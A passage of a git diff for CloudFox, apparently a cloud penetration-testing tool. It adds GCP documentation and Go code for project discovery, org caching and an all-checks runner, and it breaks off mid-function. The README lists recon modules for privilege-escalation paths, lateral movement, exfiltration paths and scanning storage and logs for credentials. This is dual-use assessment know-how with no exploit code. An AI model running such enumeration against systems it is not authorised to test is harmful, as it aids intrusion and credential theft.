diff --git a/.github/workflows/codespell.yml b/.github/workflows/codespell.yml index 75fc0b54..5fdcfe1c 100644 --- a/.github/workflows/codespell.yml +++ b/.github/workflows/codespell.yml @@ -13,4 +13,4 @@ jobs: steps: - uses: actions/checkout@v4 - run: pip install --user codespell - - run: codespell --ignore-words-list="aks" --skip="*.sum" + - run: codespell --ignore-words-list="aks,referers,invokable" --skip="*.sum" diff --git a/.gitignore b/.gitignore index 9dac55a5..cd9cead3 100644 --- a/.gitignore +++ b/.gitignore @@ -62,8 +62,11 @@ terraform.rc .DS_Store untracked/* +*tmp* +tmp/* output/* *cloudfox-output* +cloudfox-* cloudfox *.log *.bak @@ -75,4 +78,4 @@ dist/ # graphvis files *.gv -*.svg \ No newline at end of file +*.svg diff --git a/README.md b/README.md index d9f5fd53..b6070219 100644 --- a/README.md +++ b/README.md @@ -52,9 +52,9 @@ For the full documentation please refer to our [wiki](https://github.com/BishopF | Provider| CloudFox Commands | | - | - | -| AWS | 34 | -| Azure | 4 | -| GCP | 8 | +| AWS | 34 | +| Azure | 4 | +| GCP | 60 | | Kubernetes | Support Planned | @@ -106,7 +106,53 @@ Additional policy notes (as of 09/2022): | `arn:aws:iam::aws:policy/AdministratorAccess` | This will work just fine with CloudFox, but if you were handed this level of access as a penetration tester, that should probably be a finding in itself :) | ### Azure -* Viewer or similar permissions applied. +* Viewer or similar permissions applied. + +### GCP +* Google Cloud SDK installed and authenticated +* Application Default Credentials configured (`gcloud auth application-default login`) +* Recommended permissions at appropriate hierarchy levels (see below) + +#### GCP Permissions: Minimal vs Comprehensive + +**Minimal Permissions (Single Project):** + +For basic enumeration of a single project, the `roles/viewer` role provides read access to most resources (includes logging, monitoring, and compute/network viewing). + +**Comprehensive Permissions (Organization-Wide):** + +For thorough security assessments across an entire organization: + +| Scope | Role | Purpose | +| - | - | - | +| **Organization** | `roles/resourcemanager.organizationViewer` | View organization structure and metadata | +| **Organization** | `roles/iam.securityReviewer` | Review IAM policies across the organization | +| **Organization** | `roles/cloudasset.viewer` | Query Cloud Asset Inventory for all resources | +| **Organization** | `roles/cloudidentity.groupsViewer` | Enumerate Google Groups and memberships | +| **Folder** | `roles/resourcemanager.folderViewer` | View folder hierarchy and metadata | +| **Project** | `roles/viewer` | Read access to most project resources (includes logging.viewer, monitoring.viewer, compute.viewer) | +| **Tooling Project** | `roles/serviceusage.serviceUsageAdmin` | (Optional) Manage API quotas for CloudFox operations | + +> **Note:** The basic `roles/viewer` role includes permissions from `roles/logging.viewer`, `roles/monitoring.viewer`, and `roles/compute.networkViewer`, so these don't need to be granted separately. + +#### GCP API Requirements + +**APIs must be enabled in each project you want to assess.** GCP APIs are project-scoped. + +| API | Service Name | Purpose | +| - | - | - | +| Cloud Identity API | `cloudidentity.googleapis.com` | Group enumeration, inherited role analysis | +| Cloud Asset API | `cloudasset.googleapis.com` | Cross-project resource discovery | +| Cloud Resource Manager API | `cloudresourcemanager.googleapis.com` | Organization mapping, IAM enumeration | +| IAM API | `iam.googleapis.com` | IAM analysis, privilege escalation detection | +| Compute Engine API | `compute.googleapis.com` | Instance enumeration, network security | +| Secret Manager API | `secretmanager.googleapis.com` | Secrets enumeration | +| Cloud Functions API | `cloudfunctions.googleapis.com` | Serverless enumeration | +| Cloud Run API | `run.googleapis.com` | Serverless enumeration | +| Kubernetes Engine API | `container.googleapis.com` | Container security analysis | +| BigQuery API | `bigquery.googleapis.com` | Data security analysis | + +For detailed setup instructions, see the [GCP Setup Guide](https://github.com/BishopFox/cloudfox/wiki/GCP-Setup-Guide). # AWS Commands | Provider | Command Name | Description @@ -159,22 +205,82 @@ Additional policy notes (as of 09/2022): # GCP Commands -| Provider | Command Name | Description + +For detailed documentation on each GCP command, see the [GCP Commands Wiki](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands). + +| Provider | Command Name | Description | - | - | - | -| GCP | [whoami](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#whoami) | Display the email address of the GCP authenticated user | -| GCP | [all-checks](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#all-checks) | Runs all available GCP commands | -| GCP | [artifact-registry](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#artifact-registry) | Display GCP artifact registry information | -| GCP | [bigquery](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#bigquery) | Display Bigquery datasets and tables information | -| GCP | [buckets](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#buckets) | Display GCP buckets information | -| GCP | [iam](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#iam) | Display GCP IAM information | -| GCP | [instances](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#instances) | Display GCP Compute Engine instances information | -| GCP | [secrets](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#secrets) | Display GCP secrets information | +| GCP | [whoami](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#whoami) | Display identity context for the authenticated GCP user/service account | +| GCP | [iam](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#iam) | Enumerate GCP IAM principals across organizations, folders, and projects | +| GCP | [permissions](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#permissions) | Enumerate ALL permissions for each IAM entity with full inheritance explosion | +| GCP | [serviceaccounts](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#serviceaccounts) | Enumerate GCP service accounts with security analysis | +| GCP | [service-agents](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#service-agents) | Enumerate Google-managed service agents | +| GCP | [keys](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#keys) | Enumerate all GCP keys (SA keys, HMAC keys, API keys) | +| GCP | [resource-iam](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#resource-iam) | Enumerate IAM policies on GCP resources (buckets, datasets, secrets, etc.) | +| GCP | [domain-wide-delegation](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#domain-wide-delegation) | Find service accounts with Domain-Wide Delegation to Google Workspace | +| GCP | [privesc](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#privesc) | Identify privilege escalation paths in GCP projects | +| GCP | [hidden-admins](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#hidden-admins) | Identify principals who can modify IAM policies (hidden admins) | +| GCP | [identity-federation](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#identity-federation) | Enumerate Workload Identity Federation (external identities) | +| GCP | [instances](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#instances) | Enumerate GCP Compute Engine instances with security configuration | +| GCP | [gke](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#gke) | Enumerate GKE clusters with security analysis | +| GCP | [cloudrun](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#cloudrun) | Enumerate Cloud Run services and jobs with security analysis | +| GCP | [functions](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#functions) | Enumerate GCP Cloud Functions with security analysis | +| GCP | [app-engine](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#app-engine) | Enumerate App Engine applications and security configurations | +| GCP | [composer](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#composer) | Enumerate Cloud Composer environments | +| GCP | [dataproc](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#dataproc) | Enumerate Dataproc clusters | +| GCP | [dataflow](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#dataflow) | Enumerate Dataflow jobs and pipelines | +| GCP | [notebooks](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#notebooks) | Enumerate Vertex AI Workbench notebooks | +| GCP | [workload-identity](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#workload-identity) | Enumerate GKE Workload Identity and Workload Identity Federation | +| GCP | [inventory](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#inventory) | Quick resource inventory - works without Cloud Asset API | +| GCP | [storage](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#storage) | Enumerate GCP Cloud Storage buckets with security configuration | +| GCP | [storage-enum](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#storage-enum) | Enumerate GCS buckets for sensitive files (credentials, secrets, configs) | +| GCP | [bigquery](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#bigquery) | Enumerate GCP BigQuery datasets and tables with security analysis | +| GCP | [cloudsql](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#cloudsql) | Enumerate Cloud SQL instances with security analysis | +| GCP | [spanner](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#spanner) | Enumerate Cloud Spanner instances and databases | +| GCP | [bigtable](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#bigtable) | Enumerate Cloud Bigtable instances and tables | +| GCP | [filestore](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#filestore) | Enumerate Filestore NFS instances | +| GCP | [memorystore](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#memorystore) | Enumerate Memorystore (Redis) instances | +| GCP | [vpc-networks](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#vpc-networks) | Enumerate VPC Networks | +| GCP | [firewall](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#firewall) | Enumerate VPC networks and firewall rules with security analysis | +| GCP | [loadbalancers](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#loadbalancers) | Enumerate Load Balancers | +| GCP | [dns](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#dns) | Enumerate Cloud DNS zones and records with security analysis | +| GCP | [endpoints](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#endpoints) | Enumerate all network endpoints (external and internal) with IPs, ports, and hostnames | +| GCP | [private-service-connect](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#private-service-connect) | Enumerate Private Service Connect endpoints and service attachments | +| GCP | [network-topology](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#network-topology) | Visualize VPC network topology, peering relationships, and trust boundaries | +| GCP | [vpc-sc](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#vpc-sc) | Enumerate VPC Service Controls | +| GCP | [access-levels](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#access-levels) | Enumerate Access Context Manager access levels | +| GCP | [cloud-armor](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#cloud-armor) | Enumerate Cloud Armor security policies and find weaknesses | +| GCP | [iap](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#iap) | Enumerate Identity-Aware Proxy configurations | +| GCP | [beyondcorp](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#beyondcorp) | Enumerate BeyondCorp Enterprise configurations | +| GCP | [kms](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#kms) | Enumerate Cloud KMS key rings and crypto keys with security analysis | +| GCP | [secrets](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#secrets) | Enumerate GCP Secret Manager secrets with security configuration | +| GCP | [cert-manager](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#cert-manager) | Enumerate SSL/TLS certificates and find expiring or misconfigured certs | +| GCP | [org-policies](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#org-policies) | Enumerate organization policies and identify security weaknesses | +| GCP | [artifact-registry](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#artifact-registry) | Enumerate GCP Artifact Registry and Container Registry with security configuration | +| GCP | [cloudbuild](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#cloudbuild) | Enumerate Cloud Build triggers and builds | +| GCP | [source-repos](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#source-repos) | Enumerate Cloud Source Repositories | +| GCP | [scheduler](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#scheduler) | Enumerate Cloud Scheduler jobs with security analysis | +| GCP | [pubsub](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#pubsub) | Enumerate Pub/Sub topics and subscriptions with security analysis | +| GCP | [logging](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#logging) | Enumerate Cloud Logging sinks and metrics with security analysis | +| GCP | [organizations](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#organizations) | Enumerate GCP organization hierarchy | +| GCP | [asset-inventory](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#asset-inventory) | Enumerate Cloud Asset Inventory with optional dependency analysis | +| GCP | [backup-inventory](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#backup-inventory) | Enumerate backup policies, protected resources, and identify backup gaps | +| GCP | [lateral-movement](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#lateral-movement) | Map lateral movement paths, credential theft vectors, and pivot opportunities | +| GCP | [data-exfiltration](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#data-exfiltration) | Identify data exfiltration paths, potential vectors, and missing security hardening | +| GCP | [public-access](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#public-access) | Find resources with allUsers/allAuthenticatedUsers access across 16 GCP services | +| GCP | [cross-project](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#cross-project) | Analyze cross-project IAM bindings, logging sinks, and Pub/Sub exports for lateral movement | +| GCP | [foxmapper](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#foxmapper) | Run FoxMapper (graph-based IAM analysis) for privilege escalation path discovery | +| GCP | [logging-enum](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#logging-enum) | Scan Cloud Logging entries for sensitive data (credentials, tokens, PII) | +| GCP | [bigquery-enum](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#bigquery-enum) | Scan BigQuery datasets, tables, and columns for sensitive data indicators | +| GCP | [bigtable-enum](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#bigtable-enum) | Scan Bigtable instances, tables, and column families for sensitive data indicators | +| GCP | [spanner-enum](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#spanner-enum) | Scan Spanner database schemas for sensitive table and column names | # Authors * [Carlos Vendramini](https://github.com/carlosvendramini-bf) * [Seth Art (@sethsec](https://twitter.com/sethsec)) +* Joseph Barcia # Contributing [Wiki - How to Contribute](https://github.com/BishopFox/cloudfox/wiki#how-to-contribute) diff --git a/cli/gcp.go b/cli/gcp.go old mode 100644 new mode 100755 index e69efb6b..ec7e778e --- a/cli/gcp.go +++ b/cli/gcp.go @@ -3,10 +3,14 @@ package cli import ( "context" "fmt" + "strings" + "time" "github.com/BishopFox/cloudfox/gcp/commands" oauthservice "github.com/BishopFox/cloudfox/gcp/services/oauthService" + orgsservice "github.com/BishopFox/cloudfox/gcp/services/organizationsService" "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" ) @@ -16,12 +20,20 @@ var ( GCPProjectID string GCPProjectIDsFilePath string GCPProjectIDs []string + GCPAllProjects bool + + // Project name mapping (ProjectID -> DisplayName) + GCPProjectNames map[string]string // Output formatting options GCPOutputFormat string GCPOutputDirectory string GCPVerbosity int GCPWrapTable bool + GCPFlatOutput bool + + // Refresh cache flag - force re-enumeration even if cache exists + GCPRefreshCache bool // misc options // GCPIgnoreCache bool @@ -36,46 +48,442 @@ var ( Long: `See "Available Commands" for GCP Modules below`, Short: "See \"Available Commands\" for GCP Modules below", PersistentPreRun: func(cmd *cobra.Command, args []string) { + // Reset project IDs and names to avoid accumulation across commands + GCPProjectIDs = nil + GCPProjectNames = make(map[string]string) + + // Handle project discovery based on flags + // Priority: -p (single project) > -l (project list) > -A (all projects) if GCPProjectID != "" { + // Single project specified with -p/--project GCPProjectIDs = append(GCPProjectIDs, GCPProjectID) + resolveProjectNames(GCPProjectIDs) } else if GCPProjectIDsFilePath != "" { - GCPProjectIDs = internal.LoadFileLinesIntoArray(GCPProjectIDsFilePath) + // Project list specified with -l/--project-list + rawProjectIDs := internal.LoadFileLinesIntoArray(GCPProjectIDsFilePath) + GCPProjectIDs = deduplicateProjectIDs(rawProjectIDs) + resolveProjectNames(GCPProjectIDs) + } else if GCPAllProjects { + // Discover all accessible projects with -A/--all-projects + GCPLogger.InfoM("Discovering all accessible projects...", "gcp") + orgsSvc := orgsservice.New() + projects, err := orgsSvc.SearchProjects("") + if err != nil { + GCPLogger.FatalM(fmt.Sprintf("Failed to discover projects: %v. Try using -p or -l flags instead.", err), "gcp") + } + for _, proj := range projects { + if proj.State == "ACTIVE" { + GCPProjectIDs = append(GCPProjectIDs, proj.ProjectID) + GCPProjectNames[proj.ProjectID] = proj.DisplayName + } + } + if len(GCPProjectIDs) == 0 { + GCPLogger.FatalM("No accessible projects found. Check your permissions.", "gcp") + } + GCPLogger.InfoM(fmt.Sprintf("Discovered %d project(s)", len(GCPProjectIDs)), "gcp") } else { - GCPLogger.InfoM("project or project-list flags not given, commands requiring a project ID will fail", "gcp") + GCPLogger.InfoM("No project scope specified. Use -p, -l, or -A flag.", "gcp") } - // Create a context with this value to share it with subcommands at runtime + + // Create a context with project IDs and names ctx := context.WithValue(context.Background(), "projectIDs", GCPProjectIDs) + ctx = context.WithValue(ctx, "projectNames", GCPProjectNames) - // Set the context for this command which all subcommands can access via [SUBCMD].Parent().Context() - // cmd.SetContext(ctx) + // Authenticate and get account info os := oauthservice.NewOAuthService() principal, err := os.WhoAmI() if err != nil { - GCPLogger.FatalM(fmt.Sprintf("could not determine default user credential with error %s. \n\nPlease use default application default credentials: https://cloud.google.com/docs/authentication/application-default-credentials", err.Error()), "gcp") + GCPLogger.FatalM(fmt.Sprintf("could not determine default user credential with error %s.\n\nPlease use default application default credentials: https://cloud.google.com/docs/authentication/application-default-credentials\n\nTry: gcloud auth application-default login", err.Error()), "gcp") } ctx = context.WithValue(ctx, "account", principal.Email) + + // Build scope hierarchy for hierarchical output (unless --flat-output is set) + if !GCPFlatOutput && len(GCPProjectIDs) > 0 { + GCPLogger.InfoM("Building scope hierarchy for hierarchical output...", "gcp") + orgsSvc := orgsservice.New() + provider := orgsservice.NewHierarchyProvider(orgsSvc) + hierarchy, err := gcpinternal.BuildScopeHierarchy(GCPProjectIDs, provider) + if err != nil { + GCPLogger.InfoM(fmt.Sprintf("Could not build hierarchy, using flat output: %v", err), "gcp") + } else { + ctx = context.WithValue(ctx, "hierarchy", hierarchy) + // Log hierarchy summary + if len(hierarchy.Organizations) > 0 { + GCPLogger.InfoM(fmt.Sprintf("Detected %d organization(s), %d project(s)", len(hierarchy.Organizations), len(hierarchy.Projects)), "gcp") + } else { + GCPLogger.InfoM(fmt.Sprintf("Detected %d standalone project(s)", len(hierarchy.StandaloneProjs)), "gcp") + } + } + } + + // Get account for cache operations + account, _ := ctx.Value("account").(string) + + // Always try to load FoxMapper data for attack path analysis + // This allows individual modules to show the Attack Paths column + if len(GCPProjectIDs) > 0 { + // Get org ID from hierarchy if available (GCPOrganization flag may be empty) + orgID := GCPOrganization + if orgID == "" { + if hierarchy, ok := ctx.Value("hierarchy").(*gcpinternal.ScopeHierarchy); ok && hierarchy != nil { + if len(hierarchy.Organizations) > 0 { + orgID = hierarchy.Organizations[0].ID + } + } + } + + foxMapperCache := gcpinternal.TryLoadFoxMapper(orgID, GCPProjectIDs) + if foxMapperCache != nil && foxMapperCache.IsPopulated() { + ctx = gcpinternal.SetFoxMapperCacheInContext(ctx, foxMapperCache) + totalNodes, adminNodes, nodesWithPrivesc := foxMapperCache.GetStats() + ageDays := foxMapperCache.GetDataAgeDays() + + if ageDays >= 30 { + GCPLogger.WarnM(fmt.Sprintf("FoxMapper data is %d days old - consider running 'foxmapper gcp graph create' to refresh", + ageDays), "gcp") + } else { + GCPLogger.InfoM(fmt.Sprintf("FoxMapper data is %d days old", ageDays), "gcp") + } + GCPLogger.SuccessM(fmt.Sprintf("FoxMapper data loaded: %d principals, %d admins, %d with privesc", + totalNodes, adminNodes, nodesWithPrivesc), "gcp") + } + } + + // Always try to load org cache for cross-project analysis + // Cache auto-refreshes after 24 hours + // Force refresh when running the organizations command to ensure fresh data + refreshCache := GCPRefreshCache || cmd.Name() == "organizations" + orgCache := loadOrPopulateOrgCache(account, refreshCache) + if orgCache != nil && orgCache.IsPopulated() { + ctx = gcpinternal.SetOrgCacheInContext(ctx, orgCache) + } + cmd.SetContext(ctx) }, } ) +// deduplicateProjectIDs removes duplicates, trims whitespace, and filters empty entries +func deduplicateProjectIDs(projectIDs []string) []string { + seen := make(map[string]bool) + var result []string + duplicateCount := 0 + + for _, id := range projectIDs { + // Trim whitespace + id = strings.TrimSpace(id) + + // Skip empty lines + if id == "" { + continue + } + + // Skip duplicates + if seen[id] { + duplicateCount++ + continue + } + + seen[id] = true + result = append(result, id) + } + + if duplicateCount > 0 { + GCPLogger.InfoM(fmt.Sprintf("Removed %d duplicate project ID(s) from list", duplicateCount), "gcp") + } + + return result +} + +// resolveProjectNames fetches display names for given project IDs +func resolveProjectNames(projectIDs []string) { + if len(projectIDs) == 0 { + return + } + + orgsSvc := orgsservice.New() + // Fetch all accessible projects and build lookup map + projects, err := orgsSvc.SearchProjects("") + if err != nil { + // Non-fatal: we can continue without display names + GCPLogger.InfoM("Could not resolve project names, using project IDs only", "gcp") + for _, id := range projectIDs { + GCPProjectNames[id] = id // fallback to using ID as name + } + return + } + + // Build lookup from fetched projects + projectLookup := make(map[string]string) + for _, proj := range projects { + projectLookup[proj.ProjectID] = proj.DisplayName + } + + // Map our project IDs to names + for _, id := range projectIDs { + if name, ok := projectLookup[id]; ok { + GCPProjectNames[id] = name + } else { + GCPProjectNames[id] = id // fallback to using ID as name + } + } +} + // New RunAllGCPCommands function to execute all child commands var GCPAllChecksCommand = &cobra.Command{ Use: "all-checks", Short: "Runs all available GCP commands", Long: `Executes all available GCP commands to collect and display information from all supported GCP services.`, Run: func(cmd *cobra.Command, args []string) { + var executedModules []string + startTime := time.Now() + ctx := cmd.Context() + account, _ := ctx.Value("account").(string) + + // Set all-checks mode - individual modules will skip saving cache + // (we'll save consolidated cache at the end) + ctx = gcpinternal.SetAllChecksMode(ctx, true) + cmd.SetContext(ctx) + + // Load or populate org cache for cross-project modules + existingOrgCache := gcpinternal.GetOrgCacheFromContext(ctx) + if existingOrgCache == nil || !existingOrgCache.IsPopulated() { + GCPLogger.InfoM("Loading/enumerating organization data for cross-project analysis...", "all-checks") + orgCache := loadOrPopulateOrgCache(account, GCPRefreshCache) + if orgCache != nil && orgCache.IsPopulated() { + ctx = gcpinternal.SetOrgCacheInContext(ctx, orgCache) + cmd.SetContext(ctx) + } + } else { + orgs, folders, projects := existingOrgCache.GetStats() + GCPLogger.InfoM(fmt.Sprintf("Using existing org cache: %d org(s), %d folder(s), %d project(s)", orgs, folders, projects), "all-checks") + } + + // Find the privesc command to run first + var privescCmd *cobra.Command + for _, childCmd := range GCPCommands.Commands() { + if childCmd.Use == "privesc" { + privescCmd = childCmd + break + } + } + + // Run privesc command first (produces output) and load FoxMapper data for other modules + if privescCmd != nil { + GCPLogger.InfoM("Running privilege escalation analysis first...", "all-checks") + privescCmd.Run(cmd, args) + executedModules = append(executedModules, "privesc") + + // After running privesc, try to load FoxMapper data for other modules + existingFoxMapper := gcpinternal.GetFoxMapperCacheFromContext(ctx) + if existingFoxMapper != nil && existingFoxMapper.IsPopulated() { + totalNodes, adminNodes, nodesWithPrivesc := existingFoxMapper.GetStats() + GCPLogger.InfoM(fmt.Sprintf("Using existing FoxMapper cache: %d principals, %d admins, %d with privesc", totalNodes, adminNodes, nodesWithPrivesc), "all-checks") + } else { + // Get org ID from org cache if available (GCPOrganization flag may be empty) + orgID := GCPOrganization + if orgID == "" { + if orgCache := gcpinternal.GetOrgCacheFromContext(ctx); orgCache != nil && len(orgCache.Organizations) > 0 { + orgID = orgCache.Organizations[0].ID + } + } + + // Try to load FoxMapper data + foxMapperCache := gcpinternal.TryLoadFoxMapper(orgID, GCPProjectIDs) + if foxMapperCache != nil && foxMapperCache.IsPopulated() { + ctx = gcpinternal.SetFoxMapperCacheInContext(ctx, foxMapperCache) + cmd.SetContext(ctx) + totalNodes, adminNodes, nodesWithPrivesc := foxMapperCache.GetStats() + GCPLogger.SuccessM(fmt.Sprintf("FoxMapper data loaded: %d principals, %d admins, %d with privesc", totalNodes, adminNodes, nodesWithPrivesc), "all-checks") + } else { + GCPLogger.InfoM("No FoxMapper data found. Run 'foxmapper gcp graph create' for attack path analysis.", "all-checks") + } + } + GCPLogger.InfoM("", "all-checks") + } + + // Modules excluded from all-checks (run separately, not part of standard enumeration) + excludeFromAllChecks := map[string]bool{ + "privesc": true, // Already ran above + "storage-enum": true, // Sensitive data enum modules (run separately) + "logging-enum": true, + "bigquery-enum": true, + "bigtable-enum": true, + "spanner-enum": true, + } + + // Count total modules to execute (excluding self, hidden, and excluded modules) + var modulesToRun []*cobra.Command for _, childCmd := range GCPCommands.Commands() { - if childCmd == cmd { // Skip the run-all command itself to avoid infinite recursion + if childCmd == cmd { // Skip the run-all command itself continue } + if childCmd.Hidden { // Skip hidden commands + continue + } + if excludeFromAllChecks[childCmd.Use] { + continue + } + modulesToRun = append(modulesToRun, childCmd) + } + totalModules := len(modulesToRun) + + GCPLogger.InfoM(fmt.Sprintf("Starting execution of %d modules...", totalModules), "all-checks") + GCPLogger.InfoM("", "all-checks") - GCPLogger.InfoM(fmt.Sprintf("Running command: %s", childCmd.Use), "all-checks") + for i, childCmd := range modulesToRun { + GCPLogger.InfoM(fmt.Sprintf("[%d/%d] Running: %s", i+1, totalModules, childCmd.Use), "all-checks") childCmd.Run(cmd, args) + executedModules = append(executedModules, childCmd.Use) } + + // Print summary + duration := time.Since(startTime) + printExecutionSummary(executedModules, duration) }, } +// loadOrPopulateOrgCache loads org cache from disk if available, or enumerates and saves it +func loadOrPopulateOrgCache(account string, forceRefresh bool) *gcpinternal.OrgCache { + // Check if cache exists and we're not forcing refresh + if !forceRefresh && gcpinternal.OrgCacheExists(GCPOutputDirectory, account) { + // Check if cache is stale (older than 24 hours) + if gcpinternal.IsCacheStale(GCPOutputDirectory, account, "org", gcpinternal.DefaultCacheExpiration) { + age, _ := gcpinternal.GetCacheAge(GCPOutputDirectory, account, "org") + GCPLogger.InfoM(fmt.Sprintf("Org cache is stale (age: %s > 24h), refreshing...", formatDuration(age)), "gcp") + } else { + cache, metadata, err := gcpinternal.LoadOrgCacheFromFile(GCPOutputDirectory, account) + if err == nil && cache != nil { + age, _ := gcpinternal.GetCacheAge(GCPOutputDirectory, account, "org") + GCPLogger.InfoM(fmt.Sprintf("Loaded org cache from disk (age: %s, %d projects)", + formatDuration(age), metadata.TotalProjects), "gcp") + return cache + } + if err != nil { + GCPLogger.InfoM(fmt.Sprintf("Could not load org cache: %v, re-enumerating...", err), "gcp") + // Delete corrupted cache file + gcpinternal.DeleteCache(GCPOutputDirectory, account, "org") + } + } + } + + // Enumerate and create cache + cache := enumerateAndCacheOrgs(account) + return cache +} + +// enumerateAndCacheOrgs enumerates all orgs/folders/projects and saves to disk +func enumerateAndCacheOrgs(account string) *gcpinternal.OrgCache { + cache := gcpinternal.NewOrgCache() + + orgsSvc := orgsservice.New() + + // Get all organizations + orgs, err := orgsSvc.SearchOrganizations() + if err == nil { + for _, org := range orgs { + cache.AddOrganization(gcpinternal.CachedOrganization{ + ID: org.Name[len("organizations/"):], // Strip prefix + Name: org.Name, + DisplayName: org.DisplayName, + DirectoryID: org.DirectoryID, + State: org.State, + }) + } + } + + // Get all folders + folders, err := orgsSvc.SearchAllFolders() + if err == nil { + for _, folder := range folders { + cache.AddFolder(gcpinternal.CachedFolder{ + ID: folder.Name[len("folders/"):], // Strip prefix + Name: folder.Name, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + State: folder.State, + }) + } + } + + // Get all projects + projects, err := orgsSvc.SearchProjects("") + if err == nil { + for _, project := range projects { + // Extract project number from Name (format: "projects/123456789") + projectNumber := "" + if strings.HasPrefix(project.Name, "projects/") { + projectNumber = strings.TrimPrefix(project.Name, "projects/") + } + cache.AddProject(gcpinternal.CachedProject{ + ID: project.ProjectID, + Number: projectNumber, + Name: project.Name, + DisplayName: project.DisplayName, + Parent: project.Parent, + State: project.State, + }) + } + } + + cache.MarkPopulated() + + // Save to disk + err = gcpinternal.SaveOrgCacheToFile(cache, GCPOutputDirectory, account, "2.0.0") + if err != nil { + GCPLogger.InfoM(fmt.Sprintf("Could not save org cache to disk: %v", err), "gcp") + } else { + cacheDir := gcpinternal.GetCacheDirectory(GCPOutputDirectory, account) + GCPLogger.InfoM(fmt.Sprintf("Org cache saved to %s", cacheDir), "gcp") + } + + orgsCount, foldersCount, projectsCount := cache.GetStats() + GCPLogger.InfoM(fmt.Sprintf("Organization cache populated: %d org(s), %d folder(s), %d project(s)", + orgsCount, foldersCount, projectsCount), "gcp") + + return cache +} + +// printExecutionSummary prints a summary of all executed modules +func printExecutionSummary(modules []string, duration time.Duration) { + GCPLogger.InfoM("", "all-checks") // blank line + GCPLogger.InfoM("════════════════════════════════════════════════════════════", "all-checks") + GCPLogger.InfoM(" EXECUTION SUMMARY ", "all-checks") + GCPLogger.InfoM("════════════════════════════════════════════════════════════", "all-checks") + GCPLogger.InfoM(fmt.Sprintf("Total modules executed: %d", len(modules)), "all-checks") + GCPLogger.InfoM(fmt.Sprintf("Total execution time: %s", formatDuration(duration)), "all-checks") + GCPLogger.InfoM("", "all-checks") + GCPLogger.InfoM("Modules executed:", "all-checks") + + // Print modules in columns for better readability + const columnsPerRow = 4 + for i := 0; i < len(modules); i += columnsPerRow { + row := " " + for j := i; j < i+columnsPerRow && j < len(modules); j++ { + row += fmt.Sprintf("%-20s", modules[j]) + } + GCPLogger.InfoM(row, "all-checks") + } + + GCPLogger.InfoM("", "all-checks") + GCPLogger.InfoM(fmt.Sprintf("Output directory: %s", GCPOutputDirectory), "all-checks") + GCPLogger.InfoM("════════════════════════════════════════════════════════════", "all-checks") +} + +// formatDuration formats a duration in a human-readable way +func formatDuration(d 